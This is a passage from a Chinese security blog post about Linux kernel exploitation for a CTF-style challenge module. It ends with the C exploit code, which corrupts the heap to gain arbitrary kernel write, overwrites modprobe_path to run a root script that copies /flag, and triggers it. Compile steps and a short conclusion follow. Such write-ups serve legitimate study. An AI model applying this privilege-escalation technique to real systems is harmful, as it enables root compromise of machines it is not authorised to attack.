class="built_in">printf</span>(<span class="string">"[*]pool_addr: 0x%16llx\n"</span>,pool_addr);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">delete</span>(<span class="number">2</span>);</span><br><span class="line">    <span class="keyword">delete</span>(<span class="number">5</span>);</span><br><span class="line">    <span class="built_in">memset</span>(mem,<span class="string">'D'</span>,<span class="number">0x100</span>);</span><br><span class="line">    *((<span class="keyword">size_t</span>  *)mem) = pool_addr + <span class="number">0xc0</span>;</span><br><span class="line">    cin_kernel(<span class="number">4</span>,mem,<span class="number">0x100</span>,<span class="number">-0x100</span>);</span><br><span class="line">    alloc(<span class="number">7</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">    alloc(<span class="number">8</span>,mem,<span class="number">0x100</span>);</span><br><span class="line"></span><br><span class="line">    *((<span class="keyword">size_t</span> *)mem) = kernel_addr + <span class="number">0x03f960</span>;</span><br><span class="line">    *((<span class="keyword">size_t</span> *)(mem+<span class="number">0x8</span>)) = <span class="number">0x100</span>;</span><br><span class="line">    cin_kernel(<span class="number">8</span>,mem,<span class="number">0x10</span>,<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">strncpy</span>(mem,<span class="string">"/home/pwn/copy.sh\0"</span>,<span class="number">18</span>);</span><br><span class="line">	cin_kernel(<span class="number">0xc</span>,mem,<span class="number">18</span>,<span class="number">0</span>);</span><br><span class="line">    system(<span class="string">"echo -ne '#!/bin/sh\n/bin/cp /flag /home/pwn/flag\n/bin/chmod 777 /home/pwn/flag' &gt; /home/pwn/copy.sh"</span>);</span><br><span class="line">	system(<span class="string">"chmod +x /home/pwn/copy.sh"</span>);</span><br><span class="line">	system(<span class="string">"echo -ne '\\xff\\xff\\xff\\xff' &gt; /home/pwn/sir"</span>);</span><br><span class="line">	system(<span class="string">"chmod +x /home/pwn/sir"</span>);</span><br><span class="line"></span><br><span class="line">	system(<span class="string">"/home/pwn/sir"</span>);</span><br><span class="line">	system(<span class="string">"cat /home/pwn/flag"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>编译:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc exp.c -o exp -w -static</span><br></pre></td></tr></table></figure></p>
<p>运行:<br><img src="/img/kernel4_9.png" alt="9"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>我不知道利用这种方法可不可以返回一个shell回来,我试过直接将modprobe_path改为/bin/sh去执行,但是不可以;不知道改为反弹shell会不会成功,因为我的环境运行有点问题,所以就没有测试,希望知道的师傅可以说一下….</p>

      
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/08/29/Linux-kernel4/">Linux Kernel Exploit 内核漏洞学习(4)-RW Any Memory</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 钞sir 的个人博客">钞sir</a></p>
        <p><span>发布时间:</span>2019年08月29日 - 21时58分</p>
        <p><span>最后更新:</span>2019年08月29日 - 21时58分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/08/29/Linux-kernel4/" title="Linux Kernel Exploit 内核漏洞学习(4)-RW Any Memory">https://cc-sir.github.io/2019/08/29/Linux-kernel4/</a>
            <span class="copy-path" data-clipboard-text="原文: https://cc-sir.github.io/2019/08/29/Linux-kernel4/　　作者: 钞sir" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target="_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
  
    <a href="/2019/08/24/Linux-kernel-exploit2/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Linux Kernel Exploit 内核漏洞学习(3)-ROP</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#简介"><span class="toc-number">1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#前置知识"><span class="toc-number">2.</span> <span class="toc-text">前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#modprobe-path"><span class="toc-number">2.1.</span> <span class="toc-text">modprobe_path</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mod-tree"><span class="toc-number">2.2.</span> <span class="toc-text">mod_tree</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#具体分析"><span class="toc-number">3.</span> <span class="toc-text">具体分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#cin-kernel"><span class="toc-number">3.1.</span> <span class="toc-text">cin_kernel</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cout-kernel"><span class="toc-number">3.2.</span> <span class="toc-text">cout_kernel</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#delete"><span class="toc-number">3.3.</span> <span class="toc-text">delete</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#alloc"><span class="toc-number">3.4.</span> <span class="toc-text">alloc</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#思路"><span class="toc-number">4.</span> <span class="toc-text">思路</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#泄露内核地址"><span class="toc-number">4.1.</span> <span class="toc-text">泄露内核地址</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#泄露模块地址"><span class="toc-number">4.2.</span> <span class="toc-text">泄露模块地址</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Use-Modprobe-path"><span class="toc-number">5.</span> <span class="toc-text">Use Modprobe_path</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#exp"><span class="toc-number">6.</span> <span class="toc-text">exp</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#总结"><span class="toc-number">7.</span> <span class="toc-text">总结</span></a></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>







    



    <div class="scroll" id="post-nav-button">
        
            <a href="/" title="回到主页"><i class="fa fa-home"></i></a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2019/08/24/Linux-kernel-exploit2/" title="下一篇: Linux Kernel Exploit 内核漏洞学习(3)-ROP">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/08/29/Linux-kernel4/">Linux Kernel Exploit 内核漏洞学习(4)-RW Any Memory</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/24/Linux-kernel-exploit2/">Linux Kernel Exploit 内核漏洞学习(3)-ROP</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/24/Linux-kernel3/">Linux Kernel Exploit 内核漏洞学习(2)-Bypass-Smep</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/24/Linux-kernel-1/">Linux Kernel Exploit 内核漏洞学习(1)-Double Fetch</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/24/Linux-kernel-0/">Linux kernel Exploit 内核漏洞学习(0)-环境安装</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/12/hackinos/">HackInOS</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/23/fmtstr_payload/">Fmtstr_Loop</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/11/滑雪大冒险内购/">滑雪大冒险2 App内购</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/28/pwnf/">hctf2016-fheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/26/ret2_dl_runtime_resolve/">ret2_dl_runtime_resolve</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/16/PE文件格式/">PE文件格式</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/06/namebook/">namebook</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/03/unlink/">Unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/01/Tcache/">Hgame2019_babytcache</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/01/pwnable_tw/">pwnable.tw</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/22/hacknote/">pwnable.tw_hacknote</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/29/dynelf/">DynELF</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/28/ichunqiu_easypwn/">Ichunqiu_Easypwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/26/ret2libc/">Ret2libc</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/24/ret2shellcode/">Ret2ShellCode</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/20/overflow_freed_chunk/">Overflow Freed Chunk</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/19/Fastbin_Double_Free/">Fastbin Double Free</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/11/use_after_free/">Use After Free</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/11/hello-world/">Hello World</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 钞sir
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit">海贼到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>